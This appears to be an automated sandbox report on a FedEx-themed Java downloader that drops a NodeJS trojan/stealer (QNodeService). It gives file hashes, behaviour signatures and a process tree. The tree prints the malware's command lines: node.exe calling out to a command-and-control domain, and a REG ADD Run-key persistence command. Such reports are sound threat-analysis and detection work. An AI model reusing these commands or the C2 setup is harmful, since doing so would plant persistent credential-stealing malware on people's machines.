Analysis
-
max time kernel
42s -
max time network
133s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
06-11-2020 10:37
Static task
static1
Behavioral task
behavioral1
Sample
FedEx_Scan21731000921.jar
Resource
win7v20201028
Behavioral task
behavioral2
Sample
FedEx_Scan21731000921.jar
Resource
win10v20201028
General
-
Target
FedEx_Scan21731000921.jar
-
Size
111KB
-
MD5
8e2cdac7a60346d7b598d05f421c71a3
-
SHA1
9d1b7dc191121db6017d0cf766c40f7b88083aea
-
SHA256
922f41ec696ff68fa3abfe2926f7fef3f2759fa451b79271d03b97d8a6028f32
-
SHA512
775a5afbe8bad2ca8eccbb713f882d34908b6f6c903a9f5d67292674876fb6e8148abf7bccb01ee317f470c3975f9b030f35e7113f8e59d3d64227dc7f0ced7b
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 2028 node.exe 3860 node.exe 1832 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\00af0779-6157-484a-9119-287f9a3dac31 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ab6c-177.dat js behavioral2/files/0x000100000001ab6c-180.dat js behavioral2/files/0x000100000001ab6c-184.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 24 wtfismyip.com 25 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 2028 node.exe 2028 node.exe 2028 node.exe 2028 node.exe 3860 node.exe 3860 node.exe 3860 node.exe 3860 node.exe 1832 node.exe 1832 node.exe 1832 node.exe 1832 node.exe 1832 node.exe 1832 node.exe 1832 node.exe 1832 node.exe 1832 node.exe 1832 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3636 wrote to memory of 948 3636 java.exe 75 PID 3636 wrote to memory of 948 3636 java.exe 75 PID 948 wrote to memory of 2028 948 javaw.exe 79 PID 948 wrote to memory of 2028 948 javaw.exe 79 PID 2028 wrote to memory of 3860 2028 node.exe 81 PID 2028 wrote to memory of 3860 2028 node.exe 81 PID 3860 wrote to memory of 1832 3860 node.exe 82 PID 3860 wrote to memory of 1832 3860 node.exe 82 PID 1832 wrote to memory of 1784 1832 node.exe 84 PID 1832 wrote to memory of 1784 1832 node.exe 84 PID 1784 wrote to memory of 1128 1784 cmd.exe 85 PID 1784 wrote to memory of 1128 1784 cmd.exe 85
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\FedEx_Scan21731000921.jar1⤵
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\314266b8.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain topguns.ddns.net3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_KQr1H4\boot.js --hub-domain topguns.ddns.net4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3860 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_KQr1H4\boot.js --hub-domain topguns.ddns.net5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "00af0779-6157-484a-9119-287f9a3dac31" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:1784 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "00af0779-6157-484a-9119-287f9a3dac31" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:1128
-
-
-
-
-
-